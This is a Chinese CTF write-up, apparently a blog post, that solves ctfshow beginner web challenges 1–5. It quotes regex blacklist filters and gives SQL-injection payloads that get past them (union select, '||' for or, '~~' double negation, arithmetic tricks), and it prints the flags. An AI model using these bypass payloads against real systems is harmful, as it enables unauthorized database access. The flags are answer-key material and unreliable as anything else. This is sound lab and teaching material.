-
ctfshow萌新计划web1-5(正则匹配绕过)
目录
web1
题目注释相当于已经审计了代码
存在一个对id的检测,并且告诉我们flag在id=100
这里讲三个方法
(1)payload:?id=10*100
(2)使用or来绕过
payload:?id=-1 or id=1000
(3)联合注入查询
payload:?id=1 union select * from article --+
ctfshow{f9909e52-140d-4ed5-a1f3-6643378b6198}
web2
只是增加了下面这段代码,preg_match函数进行正则匹配,限制了我们使用 or 和 +
- if(preg_match("/or|\+/i",$id)){
- die("id error");
- }
使用payload:?id=10*100
成功获取flag
ctfshow{d15e0676-50aa-4bff-a09f-484e92c7b5bc} web3
这次匹配过滤掉了更多的东西
- if(preg_match("/or|\-|\\|\*|\<|\>|\!|x|hex|\+/i",$id)){
- die("id error");
- }
加减乘都被过滤了,但是没有过滤除
构造payload:?id=1/0.001
虽然or被过滤了,但是我们可以使用符号来表示或运算,即||
构造payload:?id=0 || id=1000
这里也没有过滤~,我们可以进行两次取反
构造payload:?id=~~1000
ctfshow{6ff66b11-bf8e-482b-b870-c52d1be27ccc}
web4
这次把除也过滤掉了,以及过滤掉了其他的一些符号
- if(preg_match("/or|\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)){
- die("id error");
- }
但是对我们给的另外两个payload并不影响
/?id=0 || id=1000
?id=~~1000
ctfshow{798eb84c-cd75-430f-b475-1574ff3756f5} web5
这次过滤的更多...但是它还是舍不得过滤~~~
- if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)){
- die("id error");
- }
继续使用payload:?id=~~1000
拿到flag
ctfshow{76afbf63-7e57-4992-b87c-b8bbc97f32d0}
-
相关阅读:
React项目实战之租房app项目(六)渲染房源列表&axios优化&封装顶部搜索栏&列表找房模块之条件筛选
Leetcode641 实现双端队列
servlet -> spring-mvc -> spring-boot-> spring-security目录
编译原理网课笔记——第一章
Revit SDK:StairsAutomation
[附源码]计算机毕业设计springboot校园招聘系统设计
没有谷歌翻译,我该怎么办?
PDF文档如何解密?3个软件值得收藏
y106.第六章 微服务、服务网格及Envoy实战 -- 可观测应用之指标和日志(十七)
Eclipse中打包maven项目-war包方式
- 原文地址:https://blog.csdn.net/Myon5/article/details/133777899